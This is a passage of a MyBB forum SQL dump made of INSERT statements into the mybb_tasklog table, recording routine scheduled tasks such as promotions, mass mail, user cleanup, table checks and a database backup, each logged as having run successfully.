mybb_tasklog VALUES('10914', '7', '1350500409', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('10915', '5', '1350500720', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10916', '9', '1350501063', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10917', '5', '1350501906', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10918', '9', '1350501914', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10919', '3', '1350502202', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10920', '9', '1350502830', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10921', '5', '1350503118', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10922', '9', '1350503747', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10923', '3', '1350503949', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10924', '1', '1350504038', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10925', '7', '1350504091', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('10926', '5', '1350504331', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10927', '9', '1350504684', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10928', '5', '1350505503', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10929', '9', '1350505635', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10930', '3', '1350505817', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10931', '9', '1350506456', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10932', '5', '1350506702', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10933', '9', '1350507370', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10934', '3', '1350508169', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10935', '1', '1350508183', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10936', '7', '1350508190', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('10937', '5', '1350508341', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10938', '9', '1350508434', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10939', '5', '1350509108', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10940', '9', '1350509473', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10941', '3', '1350509484', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10942', '9', '1350510035', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10943', '5', '1350510310', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10944', '9', '1350511045', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10945', '3', '1350511143', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10946', '1', '1350511203', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10947', '7', '1350511249', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('10948', '5', '1350511643', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10949', '9', '1350511921', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10950', '5', '1350513067', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10951', '9', '1350513122', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10952', '3', '1350513128', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10953', '9', '1350514095', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10954', '5', '1350514112', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10955', '9', '1350514545', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10956', '3', '1350515332', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10957', '1', '1350515338', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10958', '7', '1350515343', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('10959', '5', '1350515363', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10960', '9', '1350515475', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10961', '5', '1350516345', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10962', '9', '1350516356', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10963', '3', '1350516618', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10964', '9', '1350517683', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10965', '5', '1350517739', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10966', '9', '1350519162', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10967', '3', '1350519178', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10968', '1', '1350519214', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10969', '2', '1350519251', 'The daily cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10970', '7', '1350519253', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('10971', '11', '1350519268', 'The delayed moderation task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10972', '5', '1350519287', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10973', '5', '1350519903', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10974', '9', '1350520042', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10975', '3', '1350520385', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10976', '9', '1350520832', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10977', '5', '1350521103', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10978', '9', '1350521769', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10979', '3', '1350521955', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10980', '1', '1350522005', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10981', '7', '1350522083', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('10982', '5', '1350522308', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10983', '9', '1350522614', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10984', '5', '1350523663', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10985', '9', '1350523666', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10986', '3', '1350523809', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10987', '9', '1350524480', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10988', '5', '1350524714', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10989', '9', '1350525321', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10990', '3', '1350525548', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10991', '1', '1350525607', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10992', '7', '1350525608', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('10993', '5', '1350525905', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10994', '9', '1350526210', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10995', '5', '1350527102', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10996', '9', '1350527104', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10997', '3', '1350527418', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10998', '9', '1350528002', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10999', '5', '1350528303', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11000', '9', '1350528982', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11001', '3', '1350529148', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11002', '1', '1350529214', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11003', '7', '1350529220', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('11004', '5', '1350529512', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11005', '9', '1350529806', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11006', '5', '1350530703', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11007', '9', '1350530717', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11008', '3', '1350531073', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11009', '9', '1350531670', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11010', '5', '1350531917', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11011', '9', '1350532507', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11012', '3', '1350532752', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11013', '1', '1350533040', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11014', '7', '1350533145', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('11015', '5', '1350533145', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11016', '9', '1350534084', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11017', '5', '1350534307', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11018', '9', '1350534827', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11019', '3', '1350534927', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11020', '9', '1350536111', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11021', '5', '1350536116', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11022', '3', '1350536359', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11023', '1', '1350536431', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11024', '7', '1350536712', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('11025', '5', '1350536716', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11026', '9', '1350537058', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11027', '5', '1350537907', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11028', '9', '1350540354', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11029', '3', '1350540367', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11030', '5', '1350540728', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11031', '1', '1350540827', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11032', '7', '1350540848', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('11033', '9', '1350540871', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11034', '5', '1350541652', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11035', '9', '1350541662', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11036', '3', '1350541863', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11037', '9', '1350542667', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11038', '5', '1350542773', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11039', '9', '1350543307', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11040', '3', '1350543541', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11041', '1', '1350543607', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11042', '7', '1350543617', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('11043', '5', '1350543906', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11044', '9', '1350544215', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11045', '5', '1350545151', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11046', '9', '1350545161', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11047', '3', '1350545403', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11048', '9', '1350546007', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11049', '5', '1350546345', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11050', '9', '1350546946', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11051', '3', '1350547144', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11052', '1', '1350547216', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11053', '7', '1350547233', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('11054', '5', '1350547523', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11055', '9', '1350547840', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11056', '5', '1350548701', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11057', '9', '1350548734', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11058', '3', '1350549055', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11059', '9', '1350549629', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11060', '5', '1350549921', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11061', '9', '1350550514', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11062', '3', '1350550748', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11063', '1', '1350550802', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11064', '7', '1350550836', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('11065', '5', '1350551105', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11066', '9', '1350551425', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11067', '5', '1350552344', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11068', '9', '1350552350', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11069', '3', '1350552608', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11070', '9', '1350553218', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11071', '5', '1350553503', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11072', '9', '1350554141', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11073', '3', '1350554357', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11074', '1', '1350554404', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11075', '7', '1350554427', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('11076', '5', '1350554749', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11077', '9', '1350555270', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11078', '5', '1350555970', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11079', '9', '1350555988', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11080', '3', '1350556204', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11081', '9', '1350556816', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11082', '5', '1350557121', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11083', '9', '1350557729', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11084', '3', '1350558119', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11085', '1', '1350558205', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11086', '7', '1350558234', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('11087', '5', '1350558302', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11088', '9', '1350558617', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11089', '5', '1350559524', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11090', '9', '1350559538', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11091', '3', '1350559903', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11092', '9', '1350560626', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11093', '5', '1350560840', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11094', '9', '1350561332', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11095', '3', '1350561601', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11096', '1', '1350561610', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11097', '4', '1350561655', 'The database backup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11098', '7', '1350561859', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('11099', '5', '1350561912', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11100', '9', '1350562220', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11101', '5', '1350563101', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11102', '9', '1350563109', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11103', '3', '1350563637', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11104', '9', '1350564026', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11105', '5', '1350564310', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11106', '9', '1350565285', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11107', '3', '1350565288', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11108', '1', '1350565313', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11109', '7', '1350565435', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('11110', '5', '1350565509', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11111', '9', '1350565821', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11112', '5', '1350566705', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11113', '9', '1350566729', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11114', '3', '1350567033', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11115', '9', '1350567924', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11116', '5', '1350568162', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11117', '9', '1350568831', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11118', '3', '1350568834', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11119', '1', '1350568856', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11120', '7', '1350568868', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('11121', '5', '1350569336', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11122', '9', '1350570178', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11123', '5', '1350570625', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11124', '9', '1350570732', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11125', '3', '1350570746', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11126', '9', '1350571281', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11127', '5', '1350571555', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11128', '9', '1350572106', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11129', '3', '1350572509', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11130', '1', '1350572529', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11131', '7', '1350572531', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('11132', '5', '1350572708', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11133', '9', '1350573011', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11134', '5', '1350574328', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11135', '9', '1350574333', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11136', '3', '1350574357', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11137', '9', '1350575340', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11138', '5', '1350575343', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11139', '9', '1350575722', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11140', '3', '1350575943', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11141', '1', '1350576039', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11142', '7', '1350576047', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('11143', '5', '1350576545', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11144', '9', '1350576636', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11145', '5', '1350577529', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11146', '9', '1350577536', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11147', '3', '1350577807', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11148', '9', '1350578505', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11149', '5', '1350578791', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11150', '9', '1350579306', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11151', '3', '1350580247', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11152', '1', '1350580266', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11153', '7', '1350580281', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('11154', '5', '1350580305', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11155', '9', '1350580418', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11156', '5', '1350581103', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11157', '9', '1350581184', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11158', '3', '1350582832', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11159', '9', '1350582860', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11160', '5', '1350582907', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11161', '9', '1350583642', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11162', '3', '1350583648', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11163', '1', '1350583653', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11164', '7', '1350583655', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('11165', '5', '1350584123', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11166', '9', '1350584133', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11167', '5', '1350584710', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11168', '9', '1350584997', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11169', '3', '1350585003', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11170', '9', '1350586618', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11171', '5', '1350586622', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11172', '3', '1350587005', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11173', '1', '1350587011', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11174', '7', '1350587013', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('11175', '5', '1350587135', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11176', '9', '1350587512', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11177', '5', '1350588320', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11178', '9', '1350588381', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11179', '3', '1350588644', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11180', '9', '1350589479', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11181', '5', '1350589523', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11182', '9', '1350590129', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11183', '3', '1350590342', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11184', '1', '1350590431', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11185', '7', '1350590467', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('11186', '5', '1350590760', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11187', '9', '1350591161', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11188', '5', '1350591949', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11189', '9', '1350591975', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11190', '3', '1350592207', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11191', '9', '1350592890', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11192', '5', '1350593100', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11193', '9', '1350593746', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11194', '3', '1350593942', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11195', '1', '1350594010', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11196', '7', '1350594060', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('11197', '5', '1350594307', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11198', '9', '1350594633', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11199', '5', '1350595503', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11200', '9', '1350595532', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11201', '3', '1350595804', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11202', '9', '1350596404', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11203', '5', '1350596781', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11204', '9', '1350597318', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11205', '3', '1350597543', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11206', '1', '1350597613', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11207', '7', '1350597623', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('11208', '5', '1350597911', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11209', '9', '1350598302', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11210', '5', '1350599110', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11211', '9', '1350599185', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11212', '3', '1350599466', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11213', '9', '1350600142', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11214', '5', '1350600308', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11215', '9', '1350600905', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11216', '3', '1350601168', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11217', '1', '1350601227', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11218', '7', '1350601267', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('11219', '5', '1350601588', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('11220', '9', 